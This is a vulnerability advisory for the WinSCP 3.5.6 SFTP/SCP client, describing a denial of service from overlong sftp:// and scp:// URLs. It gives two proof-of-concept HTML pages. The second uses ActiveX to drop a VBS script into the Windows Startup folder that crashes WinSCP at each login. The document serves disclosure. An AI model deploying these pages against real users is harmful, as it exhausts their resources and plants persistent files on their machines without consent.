|
Package: WinSCP Auth: http://winscp.sourceforge.net Version(s): 3.5.6 (maybe also prior versions are vulnerable) Vulnerability: Denial of Service What’s WinSCP: “WinSCP is an open source SFTP (SSH File Transfer Protocol) and SCP (Secure CoPy) client for Windows using SSH (Secure SHell). Its main function is safe copying of files between a local and a remote computer.” Vulnerability Description: A default installation of WinSCP provide the user with functionality to handle sftp:// and scp:// addresses. The vulnerability exists due to the way the application handles long URL’s. A malformed scp:// or sftp:// address embedded in a HTML tag cause the WinSCP application to exhaust CPU and Memory resources. The attacker would need the ability to convince the user to visiting a web site he controlled or opening an HTML e-mail he had prepared. During the denial of service, WinSCP will not display any GUI. Goal: An attacker may use this flaw to prevent the users of attacked host from working properly. Pratical Examples: ------ WinSCP_DoS1.html --------WinSCP DoS URL=sftp://AAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"> ---------------------------------- -------- WinSCP_DoS2.html -------WinSCP DoS <script language="JScript"> var WshShell = new ActiveXObject("WScript.Shell"); strSU = WshShell.SpecialFolders("StartUp"); var fso = new ActiveXObject("Scripting.FileSystemObject"); var vibas = fso.CreateTextFile(strSU + "\\WinSCPDoS.vbs",true); vibas.WriteLine("Dim shell"); vibas.WriteLine("Dim quote"); vibas.WriteLine("Dim DoS"); vibas.WriteLine("Dim param"); vibas.WriteLine("DoS = \"C:\\Programmi\\WinSCP3\\WinSCP3.exe\""); vibas.WriteLine("param = \"scp://AAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\""); vibas.WriteLine("set shell = WScript.CreateObject(\"WScript.Shell\")"); vibas.WriteLine("quote = Chr(34)"); vibas.WriteLine("pgm = \"explorer\""); vibas.WriteLine("shell.Run quote & DoS & quote & \" \" & param"); vibas.Close(); </script> ---------------------------------- Credits: -- Luca ErcoliSeeweb http://www.seeweb.com